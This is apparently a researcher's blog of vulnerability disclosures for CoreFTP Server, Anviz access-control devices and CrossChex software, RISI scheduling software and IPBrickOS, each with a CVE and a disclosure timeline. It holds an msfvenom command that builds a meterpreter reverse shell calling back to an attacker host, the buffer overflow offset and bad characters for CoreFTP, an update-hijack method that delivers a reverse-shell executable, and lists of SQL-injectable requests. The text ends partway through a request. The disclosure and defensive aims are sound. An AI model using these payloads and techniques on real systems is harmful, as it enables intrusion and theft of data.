CoreFTP comes in two versions: a client and a Server. Let us focus on the server-side. CoreFTP Server is an FTP Server (shocking) that allows IT administrators not only to serve as FTP but as SFTP with client certificates and integrate with the domain. For the sake of clarity, we tested the Core FTP build 583.

Starting testing

As with every test, we start by sending some erroneous data to every user input field possible. There were a lot of crashes in the Server Management GUI. For instance, on the self-signed server certificate fields, we could overwrite the EIP pretty quickly, but the problem would be non-ASCII characters, and it would be dumb since you there already have access to the management interface that supposedly operates in Administrative mode since the server needs to bind to lower ports (0-1023).

However, this opens the door to exploit other fields. The server exposes a network port to allow clients to connect and retrieve data. I choose to go with the SFTP (Basically SSH only with file support) with SSH keys enabled. The first idea was to try to send garbage data in the Key-Exchange phase of the protocol, for instance, send an overly long encoded communication to trigger the exploit. However, the clients try to verify if the data is valid before sending. Next, I just tried the simple username with ‘A ‘*huge_amount and the server stopped responding and hanged. Hmmm..

I quickly created an environment with the service running on a Windows XP SP3 Build 2600 (because, no protections) and another on a Windows 10 machine. For the sake of clarity, my victim machine will be at 192.168.155.132, and the attackers’ machine will be at 192.168.155.176. I quickly checked the binary and verified that it doesn’t have any security extensions; this means no ASLR no DEP, nothing. Thus we don’t need to worry about bypassing these technologies. I follow the training in here (and I recommend it). I attached a debugger (ImmunityDBG) to the process and generated an SSH key pair (it doesn’t matter as we are going to find out) and use it to connect to the server but with the ‘A’*1024 as the username and we get the glorious EIP 41414141. Hurray! We control the EIP and have a primary entry point to try to exploit this!

Exploiting it (CVE-2020-19596)

If you read the tutorial link (and I think you should if it’s the first time you reading something like this), you should know that the next step is to determine the offset to rewrite the EIP. You can either do it by trial and error or be intelligent and use something like the pattern generator tool from the Metasploit framework. With that, we can see that the EIP will be overwritten after 198 bytes, which means that we need to write 198 bytes before rewriting it.

After that, find any instruction capable of jumping to our shellcode, such as a call ESP. We can use the mona script to help enumerate all the possibilities to do this. It will search for all compatible instructions in all the code and imported functions. Since the main code contains a NULL byte, we can not choose it, so we need to rely on imported DLLs. Since Windows XP have a lot of them without ALSR, we can pick one that suits us. However, it means that the exploit needs to be ported for other operating systems, service packs, maybe language, etc.

In the previous image, we can see some of the possible JUMP ESP instructions, but there are a lot more on them in a text file on your workspace:

Next, we should move along and perform a bad chars evaluation. When we send the characters to the buffer, some of them may break the normal functioning of the exploit (due to verifications or operations on them). We can use the mona script to generate an array of all possible values, from 0x00 to 0xFF or from 0 to 255. Sending this buffer and analyzing the memory afterwards gets us the bad chars. Mona script can help compare the chars and the bad chars and provide a direct response on what we should exclude of the payload.

The payload can then be crafted using the Metasploit Venom and passing the bad chars (\x00 \x01 \x02 \x0a \x0d \x40) with the ‘-b’ flag. We generate a small payload to get remote code execution:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.155.176 LPORT=443 -b '\x00\x01\x02\x0a\x0d\x40' -f python --smallest

In this case, I used a meterpreter payload just because but you can choose whatever you want. I just opened a listener on Metasploit console and ran the following exploit.

Yes, I pasted an image with the code because it could trigger Antivirus Agents since it has a very rudimentary Meterpreter shell in it. The exploit uses the paramiko paramiko SSH library to connect to the SSH service and pass the payload as the username. The connection will fail, but at that point, we should get our shell in Metasploit. One small detail, if we use the CALL ESP, the exploit will succeed, and the service will continue to run as intended, at least on this case. Hurray, we got unauthenticated RCE! =). Some additional remarks are in order: Once you get RCE and can access the file system, try to access the configuration file. There you will find several hashes encrypted with AES256, someone did a great reversing job and posted the procedure to decrypt them here. You can also look for specific memory locations of the decrypted hashes (I sure did but later found out this, at least I learn something in the process). Then you can use that credential hopefully to maintain access. The application needs to run on Administrator mode, so you just got at least Local Administrative on a machine, congratz!

There are also other versions vulnerable to this, but after version 2.1 of the CoreFTP Server, the buffer started converting to UTF-8, and we need to perform Venetian method to exploit it. I was not successful in doing that, so the last that we can achieve is Denial of Service (DoS, CVE-2020-19595). To do this, we send garbage to the buffer and crash the service. Meh, not that good but could be helpful in some situations. Maybe someone that knows more than what I do can help and exploit this.

There is the problem of portability of the exploit. I did this on a Windows XP SP3 machine (except the detection of security extensions, that I did on the Windows 10 Machine) so I won’t be bothered with ASLR and DEP modes. Since the code of the program holds bad chars, such as the NULL byte (0x00) we can’t use it to steal an instruction to jump to our shellcode. Otherwise, the exploit would work on all OSs. Therefore we needed to use some of the imported DLLs present to reuse the instruction, and then jump to our shellcode. One interesting thing to work on is to try to craft something that would bypass the authentication, jump the verification of the password and give access to files. Don’t know if it is possible but I wonder. Also, this exploit only works if the SSH key is enabled. You don’t need a user registered with it, but the server should accept it. The problem relies on the most robust configuration (using SSH keys to authenticate users) even if there is none configured.

Disclosure

This vulnerability follows the responsible disclosure standard. At first, the vendor did not reply but after insisting I got trough to someone who could patch this. After investigation, he provided the patch to clients, and after the patch is available for one month, I released this disclosure. I like to thank them for providing support for fixing this vulnerability. As a footnote, I am still waiting for the CVE ID from Mitre, when that’s available, I’ll update this page.

Timeline

01/05/2020 - Vulnerability discovery
02/06/2020 - First contact with vendor
21/06/2020 - Second contact with vendor
26/06/2020 - Vulnerability fix tested, patch confirmed
27/07/2020 - Official date of release
16/08/2020 - Real date of release
23/08/2020 - Grammer fixes, thanks to @jpdias =)
04/04/2020 - Added CVE-2020-19596 and CVE-2020-19595

Anviz Pwn! How broken devices could be? (CVE-2019-12393/CVE-2019-12391/CVE-2019-12392/CVE-2019-12390/CVE-2019-12389/CVE-2019-12388/CVE-2019-12394/CVE-2019-12518,CVE-2020-19594)

Thu, 28 Nov 2019 00:01:00 +0000

How broke is your biometrics?

Anviz study case

Anviz is a company that provides products that help secure facilities by controlling access to them, being by scanning a keycard or by verifying some biometric patterns on the people accessing it.

This story starts like so many stories start. Anviz sellers told me and @Luis Catarino that their system was ‘top of the line’ and that was as secure it can be. So, we decided to put it to the test.

Starting by building the infrastructure. The systems are quite simple to install. There are devices and there is a management application. Several implementations of the same application exist but we are going to only look for the official ones (CrossChex and Anviz Management System).

In a controlled IP network, we deploy three devices and set an IP address for each one. Then, on the management application we saw something weird as soon we tried to add the deployed devices. An Exception, cannot access memory. Humm looks weird but lets us proceed.

From the management console, we can add new devices by point to an IP and setting up a management password if needed. The console speaks by a proprietary protocol to the device. There are other ways of connecting to the device such as USB or RS-232, but let us focus on the IP implementation since it’s the most widespread.

Replay attack (CVE-2019-12393)

From the console we can perform several actions: open the door by software, retrieve records and users’ data, set the time and date and so on…

Ok, so we have a device that communicates using an IP network stack to a device. Let us analyse the protocol with Wireshark.

First, let us start with the basics. We wanted to know how to open the door with the smartphone (like the cool kids in Watch Dogs, the game). For that, we send the request to open the door and see the network traffic on Wireshark.

The first thing we tested is to replay the request. If the packet is valid and we can replay it we are sure that there is no NONCE being employed and we can just send the packet every time we want to open the door.

Success! the devices are vulnerable to replay attacks!

Reverse Engineering the protocol

If the device is vulnerable to replay attacks and the protocol doesn’t employ any encryption we can see how the authentication process is being made.

In Wireshark we know, by looking at the packets under a controlled environment, that the device answers on port tcp/5010. We can then apply a filter to only filter communication on that port and follow the TCP stream.

The packets are incorrectly labelled IPCTL packets but that’s not the correct protocol. We needed to interpret the data packets as a new protocol.

We then start by performing actions on the device to reverse engineer the protocol. Every packet starts with a preamble \xa50 and every packet has a replay attack vulnerability, meaning that for every request we made, if we replicate it, the device would answer. With that in mind, and due to the fact the packets are deterministic, we start by performing small and basic operations such as open the door by software, getting device information, get the number of records saved in the device, getting network information of the device and get the time and date of the device.

From what was able to perceive we draft the following structure:

| Preamble |       DATA UNKNOWN       |                  CMD                   |                              LEN                              |   DATA UNKOWN   |
| :------: | :----------------------: | :------------------------------------: | :-----------------------------------------------------------: | :-------------: |
|   \xa5   | <4 bytes, small numbers> | <1 byte, changes with issued command > | <2 bytes changes with the amount of data, 0 to a get command> | 2 or more bytes |

And the answers are similar depending on the information required

| Preamble |       DATA UNKNOWN        |      CMD+128       |       ACK        |                              LEN                               |   DATA UNKOWN   |
| :------: | :-----------------------: | :----------------: | :--------------: | :------------------------------------------------------------: | :-------------: |
|   \xa5   | < same as in the request> | <1 byte, CMD+128 > | 1byte(exit code) | <2 bytes changes with the ammount of data, 0 to a get command> | 2 or more bytes |

However, we weren’t able to determine where the password was being sent. We were able to look for the password in the GET_DEVICE_INFO command. This is interesting since we now know how the data is arranged (little-endian vs. big-endian). But, the password is not transmitted in any of the packets… does that mean?… Well yes, the password doesn’t do shit.

So, we have a protocol, vulnerable to replay attacks and that requires no password to respond. Now the stakes are high. If by reverse engineering the protocol we can emulate a device and retrieve information about the records stored, the fingerprint, passwords, names and PINs of every user enrolled in the device that will demonstrate that the device is prone to attacks that disclose sensitive information. Furthermore, Anviz itself propose an architecture implementation where they recommend to expose the device itself, to interconnect different sites this means that there are some people, port forwarding these connections to the world, exposing all the biometric data (small vector table) and some personally identifiable information about the users!

Thus it’s paramount to understand the protocol to be able to exploit the device. Lets head back to the CMD_OPEN_DOOR and the other requests captured:

| Preamble |   DATA UNKNOWN   | CMD  |   LEN    |       DATA UNKOWN        |
| :------: | :--------------: | :--: | :------: | :----------------------: |
|   \xa5   | \x00\x00\x00\x00 | \x5e | \x00\x00 | \x07\x05                 |

The packet data starts always with a \xa5 byte. Depending on the device we tested the following four bytes differ. Maybe something related with the device identification? Weird enough with NULL bytes the request is accepted by every device. This packet also doesn’t produce logs in the management service, meaning that no record of the operation was created (CVE-2019-12391).

Next, we saw the same two bytes for each operation we were performing, as already stated above. This suggests that it is the command code, for instance, the command to open the door, the command to get information, and so on.

Next, we saw different kinds of data, depending on if we were just requesting information or setting information. This may suggest additional parameters on the payload.

Then we got stuck. The last bytes we suspect being some kind of control but couldn’t figure it out what it was. We even tried to send NULL bytes but it wasn’t being accepted by the device. This may suggest that is some kind of checksum. From the size (2-bytes) it could be a CRC16. However, the simple CRC16 was not working out.

Then we start looking at the vendors’ Website for clues and we found them! There is an available SDK to build your own management software. This is the example of AEON a software that allows managing Anviz devices. Since that software is not free, we won’t be looking for vulnerabilities on it since we don’t have it.

By looking in the SDK we discovered all the structures needed to communicate to the device and yes, we should look it up sooner… But it was fun to know that some assumptions were actually true.

The SDK comes with a word document, with all the exported functions of the DLL SDK. It also comes with a test program that we can use to send requests.

By reviewing this document we can understand what really is sent and retrieve on the wire. It is also possible to understand the responses now. As you can see in the

As you can see in the screenshot above. No password is given (CVE-2019-12392). If you think the CchexHandle contains a connection with the password, you are wrong. the handle is just created with the connection and can be bypassed without issue since we are introducing our code that will query the device immediately. There is no prior handshake required. These behaviour is also present when you try to change settings on the device, such as changing the administrator password. No previous password is required (CVE-2019-12394). For example, you can query all the information that is stored in the device, such as cleartext passwords/pins, RFID tag, name, and several other personal parameters that the device allows you to storage to identify a user (CVE-2019-12390/CVE-2019-12389/CVE-2019-12388).

The sad part is that some assumptions are true, meaning that the password isn’t required for anything and anything that is able to speak with port tcp/5010 on the device can access ALL the information that the device stores.

Regarding the checksum. We fired up IDA to check if we could find the checksum function. This was arduous work since some symbols were available but no one has the “checksum” or “CRC” on it. To be honest I think it’s redundant that there is a checksum in a TCP connection. Additionally, someone might think: hey, why didn’t you just use the SDK to interact with the devices, you moron?”. Well albeit that being true, where is the fun in that? Furthermore, we were bound to the implementation of the API provided. That includes all “security” measures applied to it. By writing your own implementation we can fuzz the protocol if we intended to do that so.

There are several techniques to discover this function. Search for the CRC16 code (you need to know how a CRC is done at the assembly level), to go throw the flow of each function to send the payload, or since this is a function that, for every request, is called it may have a lot of references to it. This is easy to find in IDA.

This may indicate a strong candidate for the flow that we are looking for. Following the flow of a request and right before sending we came across this:

In the block named “JACKPOT”, we can see a mock function for a CRC function. So, why didn’t it worked? because of the reference in .text:100453AF. It references an array such as described in the “standard” implementation CRC32 (but remember that we are looking for CRC16).

In the implementation, there is an array with specific numbers that will be XORed with the payload so it can produce the checksum. The array has specific values for this implementation. Following the reference we get the actual array:

The other bytes are indeed variable and are related to each command, for example, if it is to set data or just retrieve it.

In the specification, there is a lot of information available, such as the methods available. some interesting methods reveal some curious functions such as retrieving GSM data (for mobile integrations) or even upload a new firmware. Just imagine uploading a backdoored firmware that allows us to pivot into the network =D.

After a while from when we discovered a document with the developed specification was “leaked” that details everything on the SDK. This helped us validating all the implementations made. Turns out, asking Anviz support is a great help.

Comparing what we suspected from what it really was we can see that it was very

| Preamble |  CHANNEL  |   CMD    |    LEN    |       DATA       |   CRC16   |
| :------: | :-------: | :------: | :-------: | :--------------: | :-------: |
|   \xa5   | <4 bytes> | <1 byte> | <2 bytes> | <0 to 400 bytes> | <2 bytes> |

An with these we test the last 2 bytes and it corresponds to the CRC16 of the first packet. This leads us to the conclusion that they are in fact checksum bytes. CRC16 bytes.

| Preamble |          CHANNEL          |      CMD+128       |       ACK        |                              LEN                               |                 DATA                  | CRC16           |
| :------: | :-----------------------: | :----------------: | :--------------: | :------------------------------------------------------------: | :-----------------------------------: | :-------------- |
|   \xa5   | < same as in the request> | <1 byte, CMD+128 > | 1byte(exit code) | <2 bytes changes with the ammount of data, 0 to a get command> | < variable number of bytes up to 400> | 2 or more bytes |

We started creating a small python program to interact with the device, to retrieve data and to add data (a user for example). This script is helpful to scrape the internet for exposed devices. We conduct a small survey using public available information to understand what companies were exposed on the internet.

We also contacted shodan to help us map all the exposed devices on the Internet. From now on, we can search shodan for these devices!

A footnote on this CRC16 quest. We thought that the CRC16 was not standard since we used a python library and it didn’t work. Turns out that it is indeed standard and there are a lot of implementations available with different polynomials. We were only stuck with one and didn’t know. Thank you @_nunohumberto for the heads up!

We need to go deeper! Exploiting the manager (CVE-2020-19594)

After these results, we contacted our national CSIRT authority to help us contacting those companies and coordinate a responsible disclosure, more on that below.

After requesting the help we kept on digging. So far we have full control of the device. We can even understand the protocol. Won’t it be cool if we pwn the management software? The software CrossChex requires Administrative credentials to run and create the necessary sockets and packets to send to the devices. If we can pwn the software we are an elevated user in a machine. Remember the first error that appears? It was trying to access an Operating System address range. That was weird. At the time we solve it by hard resetting all the devices in the network. If a device is misbehaving and caused that error, perhaps there is a chance of buffer overflow and remote compromise.

With that permissive, we look at what service were provided by the application using standard Sysinternals tools. We can see two services. One provided in TCP/33302 and other in UDP/5060. The last one is relatable to the network scan that the application allows us to do to discover new devices on the network. Again, by running Wireshark we should be able to see how a device responds. It was quick to understand that the protocol is still being used and it remains the same and since we understand it we can emulate a device and feed erroneous data to the application. For that, we create a script that fuzzed the protocol as soon as a CMD_DISCOVERY message was received. It took no time to rewrite the EIP value. But of course, an application of this calibre should have ASLR and DEP enable right? Well yes, but dudilengesactually no… It is disabled as seen in this Sysinternals Process Explorer screenshot.

By waiting for the CrosscChex broadcast looking for new devices, a custom broadcast packet was crafted and sent to the network, triggering the buffer overflow. At this point, due to the lack of memory protection, it was possible to search for a JMP ESP instruction to point the EIP register to, and a malicious payload was placed on top of the stack. Due to limitations on the UDP packets size, not all payloads were possible, but between the ones that were, popping a calculator and a reverse shell were the Proof-of-Concepts we decided to share. If you want the code for the exploit please refer it to CVE-2019-12518.

A quick exploit was build to trigger the vulnerability and has we can see, we are running as the user that started the application. However, this user needs to have elevated privileges to run the application so it is easy to escalate from here.

While looking at the network traffic we noticed a small connection to an “UPDATE” service in plain HTTP. Could it be? Does it have space for an evilgrade attack in 2019? Well, yes it does =). Edit (4/04/2021): this was later given the CVE-2020-19594.

The upgrade requests a manifest file, passing as an argument the revision name, where it states the latest version and all the files that needs to download from the server to upgrade.

Luckily this version number is stored on a file inside the installation directory. We started by going back 1 version and inspect how the installation is done, to rule out a PGP verification afterwards (like some package managers do to verify that only the vendor issued the package).

Weird enough the version number is just something to print out on the interface. To trigger the rest of the interactions you need to change the “VerNumber”. Changing to a lower number will trigger the rest of the process and we can now see what is an expected response:

As we can see in the picture, requesting a lower version number will print out a manifest with the “NewVersion” and “FileList” sections. The first, “NewVersion” is just like that, the new version. The other section, “FileList” is what indicates what files should be downloaded and replaced in the installation folder.

You can also see a new request using the same connection to GET a readme file. This text will output in the update Dialog interface.

By clicking “Upgrade” we can see in Wireshark the files being download just as we suspected!

So, what if we redirect the traffic to an attackers machine and deliver our own manifest with an infected file? In theory and since we need to run this as an administrator, we can get an administrative shell. To do that we simulate the redirect by changing the host entry in the hosts file and point to our Kali machine. Then we serve a higher version number and just a new file to be downloaded, the CrossChex.exe, which is a meterpreter reverse shell.

By creating our own server we can increment by 1 the revision number and point to an infected crosschex.exe file. The installation is done using elevated privileges and on the end, our payload is triggered and we have our reverse shell =). This means anyone that is able to intercept traffic or perform a DNS poisoning attack can compromise the service and gain elevated privileges on the software.

Pay attention to the file structure. It’s paramount that the “Upgrade.html” version number is coherent with the folder inside the ”./Upgrade/download” location.

Right after the “Upgrade” is done, the shell is popped and the victim compromised. No need for further interaction.

Disclosure

With every research, there is a time where we need to finish all up and do all the due diligence, for instance, pack everything up and disclose and alert every vulnerable entity of the problem. The main goal here is not to hurt the company that made the product, it is to raise awareness about the issue and to better secure all networks.

Yes, we can avoid so much pain and stress by not divulging our findings, but that will only create havoc when people would try to exploit this in the wild.

Ok, the first time we try to contact the vendor it did not end up well. We were ignored and we got stuck immediately. We didn’t want to release an 0-day and have stores broken into or hospitals, companies and airports that use this technology. So we contacted CNCS (Centro Nacional de Ciber Seguranca). It is a governmental entity from Portugal similar to a CSIRT that offer to aid us. With a great effort from them, we built an “attack map” this was gathered with the help of online scanners such as Shodan. With this information, we passed it to CNCS so they could contact the corresponding ISPs to gather information about the companies exposed. Due to local regulations, we couldn’t contact home registered IPs. This means that a company that didn’t declare itself as a company (companies cost for ISPs are often grater than home users) could not be reached. The others were contacted to remove the exposure from the internet before we release the tools and research.

During this information gathering, we discovered a great number of exposed devices. We started questioned why is that? Why so many BIG companies exposed such devices. The answer lies in the documentation itself. As we should notice by now, RTFM comes in great help here. It turns out that the company recommends that the device should be exposed for intersite connectivity! Just do a port forwarding and you are done! No site2site tunnel, no firewall rules, just expose it since it’s all secure, right? At this point, a researcher disclosed some similar vulnerabilities as us. This is great for us since it proves that our results can be replicated!

Since there was no response to almost four tries, and since we got the all-clear from CNCS, we decided to publish the results. Meanwhile, the vendor decided to publish an article stating that their new version is GDPR compliant and such, but ignored us anyway. Since we did not send technical details about the vulnerabilities we don’t know what fixes were made.

Again, this research is released to the public but use it wisely, don’t do warm to other people and be conscious about every command you type!

Edit (04/04/2021 Added CVE entry for evilgrade CVE-2020-19594)

Conclusion

This product is essentially flawed. In addition to the bad architecture and design of the product is the company posture regarding security. They did not contact us back during all the time we presented the issue. Even ignored the CSIRT contacts. There are mitigations to this issue. The first is to set all these devices on a segmented network without Internet access. Off course we are going to lose some functionality but that is the cost of having a “defective” device in the network.

Regarding our own experience, it was awesome combining so many techniques to defeat the system! Since reverse engineering network protocols to exploiting buffer overflow and DNS poisoning. And obviously, the great contribution is to alert the community that even though a product is sold as a security product, it should have a security revision to ensure that it cannot jeopardize the security of the enterprise. One of the greatest interactions was the study that we made to understand how many people were vulnerable and warn them to protect them before releasing this vulnerability since the vendor refuses to answer our emails and warn their customers.

From this disclosure we are making a tool to help other people research these issues in the future and to exploit it even further (in case someone is interested ;) ) here.

SQL injection in RISI - Gestão de Horários (CVE-2019-6491)

Fri, 01 Feb 2019 00:02:00 +0000

RISI Expert Software Solutions more specifically the Gestão de Horário (Schedule Management in English) suffers from a SQL injection in the login form.

Since this is mainly a Human Resources management software by abusing this vulnerability, it is possible to enumerate the database and retrieve sensitive information. Since this application also supports LDAP connectivity to a domain, it is possible to obtain information about that connection and possibly escalate privileges on the domain if the authentication is badly configured.

This vulnerability has been identified by MITRE as CVE-2019-6491.

Scope of the problem

According to RISIs own website, this software is used in several Portugal Hospitals.

In a quick Google search, we can see that the own National Institute for Medical Emergency (INEM - Instituto Nacional de Emergência Médica) is also supported by this software and belongs to a Network Domain.

This could have severe consequences for those who rely on the safety of their fleet as well as the people who work for INEM.

Problem

Analyzing the interface we see that there are two ways to login, using Domain credentials or using a “Normal” authentication that uses the underlining database to authenticate the user.

This normal authentication requires an identification number. If we try to write any other character than a Number, the application will block it.

Analyzing the code we can see that a JavaScript Event CheckNumeric is attached to the keyboard and if the check fails, the character is not appended to the string.

However, we can remove or replace this event or even edit the request to insert whatever necessary to exploit the system.

By appending the ‘“qwerty payload, we see an error message regarding the SQL query. This is a good indicator of a SQL injection. Due to the severity of the incident, the correspondent CSIRT was contacted to handle the incident.

A third-party, that wishes to remain anonymous, confirmed that there was indeed an SQL injection vulnerability capable of being leveraged. This would allow an attacker to access the database and all its data.

The txtUser parameter was found to be Union select (NULL) 4 columns and inline query injectable.

The “Normal” authentication should be enable to exploit this vector!

The vulnerability was detected in RISI - Gestão de Horário version 3201.09.08 rev.23. Although fixed, the vendor did not update the version number so a manual confirmation should be made to check for the vulnerability.

The validation of the User ID is now being made in the event and on the server side through an int cast of the value.

Concluding

This vulnerability was considered critical and dealt accordingly with the help of the National CSIRT of Portugal.

The vendor was quick to patch the exposed, vulnerable systems and update the internal services accordingly.

From an outside standpoint, although the risk being there, it seems that no IOC was detected.

This vulnerability was discovered with the help of Professor João Neves. (Thank you)

Timeline

18/01/2019 - First contact to request security contact and incident handling
19/01/2019 - CVE ID allocated
28/01/2019 - Vendor confirmed Fix
01/02/2019 - Disclose

References

OWASP-SQL injection

OWASP-SQL injection Mitigation

I do not promote the exploitation of this vulnerability for malicious purposes. My research was only an academic one without interference or harm to any people.

Multiple Vulnerabilties in IPBrickOS (CVE-2018-16136) (CVE-2018-16137) (CVE-2018-16138)

Fri, 01 Feb 2019 00:01:00 +0000

In today’s post we will look into an Operating System designed as an All-in-one solution to carry out management of enterprise computer networks. It acts as a firewall VoIP central, WebServer, FileServer and so on..

Although the “OS” (IPBrickOS) uses open source libraries and tools, they are poorly implemented. Since the company provides a trial for testing the system, I decided to install it, configure it like any other and try it out to look for anything sketchy.

It wasn’t long for me to find situations that are not common in a security application, let alone a firewall.

Let’s start at the beginning. IPBrickOS (administrator interface) has a vulnerability called Session Fixation. This vulnerability causes the reuse of a session that shouldn’t be active anymore. In dumb terms on the login page, there is a method that counts down the session time to expire. After the time expire the session should be destroyed, and a new session ID should be provided upon the request. However, if we make a request with the same sessionID, it’s accepted, and the login will be “regenerated”.

This is dangerous since, for some reason, an attacker obtains a session cookie that had expired, if the administrators’ logins again using the same cookie, the authentication is bypassed.

Some would say that the attack is a bit far fetched. But imagine if an attacker is able to set a cookie and wait for the administrator to login. Then he is able to, using the same cookie, to impersonate the user. This may be seen on the OWASP guide (link above) and how an attacker may do this.

Continuing reading this post will see that, this situation, is easy to exploit.

CVE-2018-16136 Lack of Anti-CSRF tokens in the whole administrative interface

The administrator interface (shortly called IPBrickOS from now on) does NOT enforce the check for CSRF. As seen in this post this vulnerability may lead to the unknown submission of unwanted forms. An example: creating a new administrator to access the interface. And for the reader that thinks that POST forms aren’t vulnerable, please read this carefully!

Every single form of this application is vulnerable. Yes, the administrator needs to be logged in, still not a vulnerability that should be presented in a security appliance.

CVE-2018-16137 SQL injection

This vulnerability is concerning. This security “solution” doesn’t validate almost any forms. In part since they think that an authenticated user will not exploit the system to obtain access to the database. This “solution” obfuscates the PHP code with the Zend Guard, so it will be difficult to read source files. However, we can extrapolate some information from the database: Users, Passwords various configurations and so on.

Luckily we have both authenticated and unauthenticated SQL injection. Although the unauthenticated that I found are from a schema that doesn’t have information about sessions. However, there is an unauthenticated SQL injection for the logs of the Web Proxy of the solution. This leaks out users and URLs. It can impact severely on the security of the enterprise to understand preferences and for user enumeration. Other endpoints are available related to other access that we can extrapolate from the URL of the injection points.

Unfortunately, the authenticated part is segregated from the authenticated part. However, that doesn’t exclude the ability to escalate privileges.

UnAuthenticated

POST
https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php
dateStart=2018-03-14&dateEnd=2018-03-14&periodo=1&musername=1&msourceip=1&mtimestamp=1&msize=1&mcode=1&murl=1&fusername=*&fsourceip=&furl=&offset=0&limit=100&orderby=0&orderby2=0

POST
https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php
dateStart=2018-03-14&dateEnd=2018-03-14&periodo=1&musername=1&msourceip=1&mtimestamp=1&msize=1&mcode=1&murl=1&fusername=&fsourceip=&furl=*&offset=0&limit=100&orderby=0&orderby2=0

POST
https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php
dateStart=2018-03-14&dateEnd=2018-03-14&periodo=1&musername=1&msourceip=1&mtimestamp=1&msize=1&mcode=1&murl=1&fusername=&fsourceip=*&furl=&offset=0&limit=100&orderby=0&orderby2=0

POST
https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php
dateStart=2018-03-14*&dateEnd=2018-03-14&periodo=1&musername=1&msourceip=1&mtimestamp=1&msize=1&mcode=1&murl=1&fusername=&fsourceip=&furl=&offset=0&limit=100&orderby=0&orderby2=0

POST
https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php
dateStart=2018-03-14&dateEnd=2018-03-14*&periodo=1&musername=1&msourceip=1&mtimestamp=1&msize=1&mcode=1&murl=1&fusername=&fsourceip=&furl=&offset=0&limit=100&orderby=0&orderby2=0

POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ssl.php
dateStart=2018-03-16*&dateEnd=2018-03-16&periodo=1&offset=0&limit=100&orderby=1&orderby2=0

POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ssl.php
dateStart=2018-03-16&dateEnd=2018-03-16*&periodo=1&offset=0&limit=100&orderby=1&orderby2=0

POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ppp.php
dateStart=2018-03-16*&dateEnd=2018-03-16&periodo=1&offset=0&limit=100&orderby=1&orderby2=0

POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ppp.php
dateStart=2018-03-16&dateEnd=2018-03-16*&periodo=1&offset=0&limit=100&orderby=1&orderby2=0

POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ftp.php
dateStart=2018-03-16*&dateEnd=2018-03-16&periodo=1&offset=0&limit=100&orderby=1&orderby2=0

POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ftp.php
dateStart=2018-03-16&dateEnd=2018-03-16*&periodo=1&offset=0&limit=100&orderby=1&orderby2=0

Authenticated

GET
https://ipbrick.domain.com/corpo.php?pagina=utilizador_alterar&f_utilizador=*

GET
https://ipbrick.domain.com/corpo.php?pagina=voip_placas_pstn_inserir&tipoplaca=297373351*

GET
https://ipbrick.domain.com/corpo.php?pagina=export_access_pdf&dateStart=2018-03-16&dateEnd=2018-03-16&periodo=1&a_ppp=ppp*&offset=0&limit=0

GET
https://ipbrick.domain.com/corpo.php?pagina=export_access_pdf&dateStart=2018-03-16&dateEnd=2018-03-16&periodo=1&a_ssl=ssl*&offset=0&limit=0

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 